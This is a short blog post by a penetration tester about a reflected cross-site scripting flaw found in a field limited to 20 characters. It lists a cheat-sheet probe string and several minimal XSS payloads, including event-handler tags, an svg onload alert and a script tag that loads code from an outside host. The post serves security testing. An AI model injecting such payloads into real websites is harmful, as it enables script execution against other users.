While testing an app, a text field was not accepting more than 20 characters (server side validation). I inserted following piece of code to check XSS (From RSnake’s XSS cheat sheet):
'';!--"<XSS>=&{()}
and verified the HTML source for the encoded characters . As < was in the HTML source, the input field was seem to be missing output encoding and hence was vulnerable to cross site scripting.
Now, I just needed a popup to conclude this theory. I started looking for a smaller script. I tried to create/find some payloads which were less than 20 characters but I was unable to find anything. At that point of time, a random question came to my mind that, what is the smallest possible payload to pop up an alert. I know it was not needed to prove the XSS or missing output encoding but just a random question.
Here are some possible payloads compiled from my own answer and a few others:
<a href=http://a.by>
<a onclick=alert(2)>
<b onclick=alert(2)>
<script src=//h4k.me
Update (7th March, 2019)- This is very old post and may be obsolete now. I guess as someone replied to that question in 2017, following may be the smallest payload to pop up an alert now. I need to check.
<svg/onload=alert()>
Pankaj Upadhyay 